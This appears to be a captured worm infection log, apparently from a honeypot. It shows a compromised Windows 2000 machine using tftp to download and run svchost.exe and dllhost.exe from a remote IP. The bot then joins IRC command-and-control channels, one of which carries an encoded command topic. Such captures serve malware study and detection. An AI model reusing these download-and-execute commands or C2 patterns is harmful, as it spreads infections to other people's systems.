VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp. C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\wins File Not Found C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcache File Not Found C:\\WINNT\\system32>
VICTIM: tftp -i 118.87.20.81 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 23 seconds, 3494 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 118.87.20.81 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 25 seconds, 3215 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: C:\\WINNT\\system32>
VICTIM: USER gxizzv gxizzv gxizzv :nsutetrhqmufpekc
VICTIM: NICK rGWPLhPR
ATTACKER: NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Checking Ident NOTICE AUTH :*** No Ident response
ATTACKER: :norks.org 001 rGWPLhPR :Welcome to the Internet Relay Network rGWPLhPR:norks.org 002 rGWPLhPR :Your host is localhost, running version 2.9/hybrid-6.3NOTICE rGWPLhPR :*** Your host is localhost, running version 2.9/hybrid-6.3:norks.org 003 rGWPLhPR :This server was created Thu Dec 6 2001 at 11:52:49 GMT:norks.org 004 rGWPLhPR norks.org 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve:norks.org 251 rGWPLhPR :There are 2 users and 0 invisible on 1 servers:norks.org 255 rGWPLhPR :I have 2 clients and 0 servers:norks.org 265 rGWPLhPR :Current local users: 2 Max: 2:norks.org 266 rGWPLhPR :Current global users: 2 Max: 2:norks.org 250 rGWPLhPR :Highest connection count: 2 (2 clients) (2 since server was (re)started):norks.org 375 rGWPLhPR :- norks.org Message of the Day -:norks.org 372 rGWPLhPR :- Where's the kaboom? There was supposed to be an earth shattering kaboom.:norks.org 376 rGWPLhPR :End of /MOTD command.
VICTIM: MODE rGWPLhPR +xi
VICTIM: JOIN #last USERHOST rGWPLhPR
ATTACKER: :rGWPLhPR!gxizzv@192.168.1.182 JOIN :#last
VICTIM: MODE #last +smntu
ATTACKER: :norks.org MODE #last +nt:norks.org 353 rGWPLhPR = #last :@wloos rGWPLhPR:norks.org 366 rGWPLhPR #last :End of /NAMES list.:norks.org 332 rGWPLhPR #last ::norks.org 333 rGWPLhPR #last rGWPLhPR 1251838846:wloos!~wloos@norks.org PRIVMSG #last :
ATTACKER: :norks.org 324 rGWPLhPR #last +smntu +tn:norks.org 329 rGWPLhPR #last +smntu 1251838846
VICTIM: USER gxizzv gxizzv gxizzv :nsutetrhqmufpekc
ATTACKER: NICK rGWPLhPR
ATTACKER: :hub.20582.com 001 rGWPLhPR :eduzz, rGWPLhPR!gxizzv@192.168.1.182:hub.20582.com 005 rGWPLhPR MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:hub.20582.com 005 rGWPLhPR WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=eduzz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:rGWPLhPR MODE rGWPLhPR :+iRp:rGWPLhPR!gxizzv@192.168.1.182 JOIN :#m:hub.20582.com 332 rGWPLhPR #m :=MIDfOh3VBIUm3mTH527LDMu+p9TpFz6iwDmtgMf9QIz3IJ4j3dVWgm3s18S7KGE4i6ugfOnZfW9KpiNPvvyb8f8p5/ONCi6cN0vmh3xt47jIPeoUfwjFqHk86INwp99KpB0gJFtfH5liGlPBVtylu7X/mZPz3gL0zdXujQTPncg4F1l2UygfQLgJYL/nABJ:hub.20582.com 333 rGWPLhPR #m tcrqtvgpohc 1250870846:hub.20582.com 353 rGWPLhPR @ #m :rGWPLhPR :hub.20582.com 366 rGWPLhPR #m :End of /NAMES list.
VICTIM: MODE rGWPLhPR +xi
VICTIM: JOIN #last USERHOST rGWPLhPR MODE #m +smntu PRIVMSG #m :-\00304\0022\003\002- Running TFTP wormride thread
ATTACKER: :rGWPLhPR!gxizzv@192.168.1.182 JOIN :#last:hub.20582.com 353 rGWPLhPR @ #last :rGWPLhPR :hub.20582.com 366 rGWPLhPR #last :End of /NAMES list.:hub.20582.com 302 rGWPLhPR :rGWPLhPR=+gxizzv@192.168.1.182 :hub.20582.com 482 rGWPLhPR #m :You're not channel operator:hub.20582.com 404 rGWPLhPR #m :You must have a registered nick (+r) to talk on this channel (#m)
VICTIM: MODE #last +smntu
ATTACKER: :hub.20582.com 482 rGWPLhPR #last :You're not channel operator